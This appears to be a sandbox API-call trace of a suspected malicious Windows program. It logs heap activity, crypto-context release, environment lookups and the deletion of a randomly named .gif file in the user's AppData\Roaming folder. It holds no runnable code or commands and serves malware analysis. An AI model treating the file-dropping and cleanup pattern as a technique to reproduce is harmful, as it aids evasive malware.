HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0122.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0122.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1f8 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fd0 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0122.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa150 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa018 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fe8 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa048 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0122.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0122.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa120 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa168 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0a8 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0122.545] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0122.545] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.545] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.546] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.546] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.546] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.546] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0122.546] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.546] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.546] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.546] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.546] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.547] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.547] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.547] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.547] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.547] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.547] CryptReleaseContext (hProv=0x9bf088, dwFlags=0x0) returned 1 [0122.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.548] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.548] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.548] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.548] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.548] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0122.548] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.548] CloseHandle (hObject=0x4f0) returned 1 [0122.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.549] CloseHandle (hObject=0x4f4) returned 1 [0122.551] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.552] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.552] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.552] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.552] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/F74jGmHWDSdyxplK8Zu.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif", lpFilePart=0x8cedf4*="F74jGmHWDSdyxplK8Zu.gif") returned 0x37 [0122.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f74jgmhwdsdyxplk8zu.gif")) returned 0x20 [0122.553] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6173d640, ftCreationTime.dwHighDateTime=0x1d5d355, ftLastAccessTime.dwLowDateTime=0x400efdf0, ftLastAccessTime.dwHighDateTime=0x1d5ca26, ftLastWriteTime.dwLowDateTime=0x400efdf0, ftLastWriteTime.dwHighDateTime=0x1d5ca26, nFileSizeHigh=0x0, nFileSizeLow=0x13aff, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="F74jGmHWDSdyxplK8Zu.gif", cAlternateFileName="F74JGM~1.GIF")) returned 0x9a47c0 [0122.553] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\F74jGmHWDSdyxplK8Zu.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f74jgmhwdsdyxplk8zu.gif")) returned 1 [0122.570] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6173d640, ftCreationTime.dwHighDateTime=0x1d5d355, ftLastAccessTime.dwLowDateTime=0x400efdf0, ftLastAccessTime.dwHighDateTime=0x1d5ca26, ftLastWriteTime.dwLowDateTime=0x400efdf0, ftLastWriteTime.dwHighDateTime=0x1d5ca26, nFileSizeHigh=0x0, nFileSizeLow=0x13aff, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="F74jGmHWDSdyxplK8Zu.gif", cAlternateFileName="F74JGM~1.GIF")) returned 0 [0122.570] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0122.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.571] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.571] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.571] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0122.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.572] 